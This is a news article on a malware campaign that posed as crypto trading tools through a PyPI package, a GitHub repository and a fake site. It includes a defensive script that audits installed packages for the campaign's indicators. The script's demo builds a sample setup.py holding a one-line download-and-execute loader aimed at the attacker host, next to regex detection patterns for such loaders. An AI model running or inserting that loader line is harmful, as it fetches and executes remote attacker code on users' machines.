
A new malware, disguised as a suite of crypto trading tools, has been discovered attempting to steal sensitive data and drain victims' wallets.
Researchers at cybersecurity firm Checkmarx reported that the invasive malware campaign was orchestrated through multiple attack vectors, including a malicious Python package named "CryptoAITools" on PyPI (Python Package Index) and a deceptive GitHub repository named "Meme-Token-Hunter-Bot." The malware targeted both macOS and Windows users.
According to the researchers, a deceptive graphical user interface distracts victims while the malware runs a multi-stage infection process. It used a fake website, coinsw.app, which pretends to be a legitimate crypto trading bot service, to host and deliver second-stage payloads.
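A defender can turn the indicators named above (the PyPI package name, the GitHub repository name and the second-stage host coinsw.app) into a simple audit of an installed Python environment. The script below is an added example written for this article, not Checkmarx's tooling; it scans a package tree for those indicators and for the staged-loader pattern of a setup.py that fetches and executes remote content, and the sample package files it builds are constructed.

```python
"""Audit a Python package tree for the indicators this article describes:
references to the second-stage host (coinsw.app) and install-time code that
downloads and executes remote content. Example code written for this article,
not Checkmarx's tooling; the sample files in demo() are constructed."""
import pathlib
import re
import tempfile

# Indicators taken from the article; extend with your own threat intel.
INDICATORS = ("coinsw.app", "CryptoAITools", "Meme-Token-Hunter-Bot")

# Download-then-execute pairs typical of a staged loader in setup.py.
FETCH_RE = re.compile(r"urlopen\(|requests\.get\(|http\.client", re.I)
EXEC_RE = re.compile(r"\bexec\(|\beval\(|subprocess\.", re.I)


def scan_file(path: pathlib.Path) -> list[str]:
    """Return the reasons a file looks suspicious (empty list if clean)."""
    text = path.read_text(errors="ignore")
    lowered = text.lower()
    reasons = [f"indicator:{ioc}" for ioc in INDICATORS if ioc.lower() in lowered]
    # A setup.py that both fetches remote data and executes it is a staged loader.
    if path.name == "setup.py" and FETCH_RE.search(text) and EXEC_RE.search(text):
        reasons.append("setup.py fetches and executes remote content")
    return reasons


def scan_tree(root: pathlib.Path) -> dict[str, list[str]]:
    """Map each flagged *.py file (path relative to root) to its reasons."""
    return {
        p.relative_to(root).as_posix(): r
        for p in sorted(root.rglob("*.py"))
        if (r := scan_file(p))
    }


def demo() -> dict[str, list[str]]:
    """Constructed site-packages tree: one clean package, one staged loader."""
    root = pathlib.Path(tempfile.mkdtemp())
    (root / "goodpkg").mkdir()
    (root / "goodpkg" / "__init__.py").write_text("VERSION = '1.0'\n")
    (root / "badpkg").mkdir()
    (root / "badpkg" / "setup.py").write_text(
        "from urllib.request import urlopen\n"
        "exec(urlopen('https://coinsw.app/stage2').read())  # constructed sample\n"
    )
    return scan_tree(root)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

Point `scan_tree` at a real site-packages directory to audit an environment; a hit on the indicator list or the fetch-and-execute pattern is a reason to quarantine the host and rotate wallet and browser credentials.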
"The malware displayed extensive data theft capabilities focused on cryptocurrency-related information, including wallet data, browser data, and sensitive system files," Checkmarx explained, adding that "the true scope of the attack may be larger than initially thought."
The researchers noted that users who starred or forked the malicious "Meme-Token-Hunter-Bot" repository are potential victims, "significantly expanding the attack's reach."
No estimations of potential losses have been provided.
The research also found that the attacker employed multiple infection vectors and social engineering tactics. They operated a Telegram chat called "Pancakeswap prediction bot," where the attacker directly engaged with potential victims.
According to the researchers, in the chat the attacker offered "bot support" to establish credibility and trust. Later, they reportedly lured victims by proposing a free trial period followed by a monthly subscription model. To further legitimize the service, they personalized the experience by offering customized configuration options and continuous support.
"This multi-platform approach allows the attacker to cast a wide net, potentially reaching victims who might be cautious about one platform but trust another," the researchers concluded, adding that "this attack erodes trust in cryptocurrency tools and platforms."